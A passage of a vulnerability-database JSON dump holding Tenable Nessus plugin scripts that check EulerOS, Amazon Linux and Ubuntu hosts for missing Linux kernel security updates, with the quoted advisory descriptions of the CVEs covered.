updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the processing of incoming L2CAP\n bluetooth commands. Uninitialized stack variables can\n be sent to an attacker leaking data in kernel address\n space.(CVE-2017-1000410)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1319\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b266419\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.59.59.46.h35\",\n \"kernel-debug-3.10.0-327.59.59.46.h35\",\n \"kernel-debug-devel-3.10.0-327.59.59.46.h35\",\n \"kernel-debuginfo-3.10.0-327.59.59.46.h35\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.59.59.46.h35\",\n \"kernel-devel-3.10.0-327.59.59.46.h35\",\n \"kernel-headers-3.10.0-327.59.59.46.h35\",\n \"kernel-tools-3.10.0-327.59.59.46.h35\",\n \"kernel-tools-libs-3.10.0-327.59.59.46.h35\",\n \"perf-3.10.0-327.59.59.46.h35\",\n \"python-perf-3.10.0-327.59.59.46.h35\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:14:08", "description": "A flaw was found in the patches used to fix the 'dirtycow'\nvulnerability (CVE-2016-5195). An attacker, able to run local code,\ncan exploit a race condition in transparent huge pages to modify\nusually read-only huge pages. (CVE-2017-1000405)\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel\nprocessor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It\ncould occur if a guest was to flood the I/O port 0x80 with write\nrequests. A guest user could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2017-1000407)\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through\n4.13.11 allows local users to cause a denial of service (NULL pointer\ndereference and system crash) or possibly have unspecified other\nimpact via a crafted USB device. (CVE-2017-16647)\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(BUG and system crash) or possibly have unspecified other impact via a\ncrafted USB device. (CVE-2017-16646)\n\nThe ims_pcu_get_cdc_union_desc function in\ndrivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11\nallows local users to cause a denial of service\n(ims_pcu_parse_cdc_data out-of-bounds read and system crash) or\npossibly have unspecified other impact via a crafted USB device.\n(CVE-2017-16645)\n\nThe parse_hid_report_descriptor function in\ndrivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows\nlocal users to cause a denial of service (out-of-bounds read and\nsystem crash) or possibly have unspecified other impact via a crafted\nUSB device. (CVE-2017-16643)\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux\nkernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb\nranges. This allows local users to obtain sensitive information from\nuninitialized kernel memory via crafted use of the mincore() system\ncall. (CVE-2017-16994)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(divide-by-zero error and system crash) or possibly have unspecified\nother impact via a crafted USB device. (CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in\nthe Linux kernel through 4.13.11 allows local users to cause a denial\nof service (divide-by-zero error and system crash) or possibly have\nunspecified other impact via a crafted USB device. (CVE-2017-16649)\n\nA vulnerability was found in the Linux kernel when peeling off an\nassociation to the socket in another network namespace. All transports\nin this association are not to be rehashed and keep using the old key\nin hashtable, thus removing transports from hashtable when closing the\nsocket, all transports are being freed. Later on a use-after-free\nissue could be caused when looking up an association and dereferencing\nthe transports. (CVE-2017-15115)", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-26T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2017-937) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "modified": "2017-12-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-937.NASL", "href": "https://www.tenable.com/plugins/nessus/105422", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-937.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105422);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000405\", \"CVE-2017-1000407\", \"CVE-2017-15115\", \"CVE-2017-16643\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"ALAS\", value:\"2017-937\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2017-937) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in the patches used to fix the 'dirtycow'\nvulnerability (CVE-2016-5195). An attacker, able to run local code,\ncan exploit a race condition in transparent huge pages to modify\nusually read-only huge pages. (CVE-2017-1000405)\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel\nprocessor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It\ncould occur if a guest was to flood the I/O port 0x80 with write\nrequests. A guest user could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2017-1000407)\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through\n4.13.11 allows local users to cause a denial of service (NULL pointer\ndereference and system crash) or possibly have unspecified other\nimpact via a crafted USB device. (CVE-2017-16647)\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(BUG and system crash) or possibly have unspecified other impact via a\ncrafted USB device. (CVE-2017-16646)\n\nThe ims_pcu_get_cdc_union_desc function in\ndrivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11\nallows local users to cause a denial of service\n(ims_pcu_parse_cdc_data out-of-bounds read and system crash) or\npossibly have unspecified other impact via a crafted USB device.\n(CVE-2017-16645)\n\nThe parse_hid_report_descriptor function in\ndrivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows\nlocal users to cause a denial of service (out-of-bounds read and\nsystem crash) or possibly have unspecified other impact via a crafted\nUSB device. (CVE-2017-16643)\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux\nkernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb\nranges. This allows local users to obtain sensitive information from\nuninitialized kernel memory via crafted use of the mincore() system\ncall. (CVE-2017-16994)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(divide-by-zero error and system crash) or possibly have unspecified\nother impact via a crafted USB device. (CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in\nthe Linux kernel through 4.13.11 allows local users to cause a denial\nof service (divide-by-zero error and system crash) or possibly have\nunspecified other impact via a crafted USB device. (CVE-2017-16649)\n\nA vulnerability was found in the Linux kernel when peeling off an\nassociation to the socket in another network namespace. All transports\nin this association are not to be rehashed and keep using the old key\nin hashtable, thus removing transports from hashtable when closing the\nsocket, all transports are being freed. Later on a use-after-free\nissue could be caused when looking up an association and dereferencing\nthe transports. (CVE-2017-15115)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-937.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.9.70-22.55.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:06", "description": "It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds during\nRDMA page allocation. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-05T00:00:00", "title": "Ubuntu 17.10 : linux-raspi2 vulnerabilities (USN-3617-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-raspi2"], "id": "UBUNTU_USN-3617-3.NASL", "href": "https://www.tenable.com/plugins/nessus/108840", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108840);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-3\");\n\n script_name(english:\"Ubuntu 17.10 : linux-raspi2 vulnerabilities (USN-3617-3)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na tasks' default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). 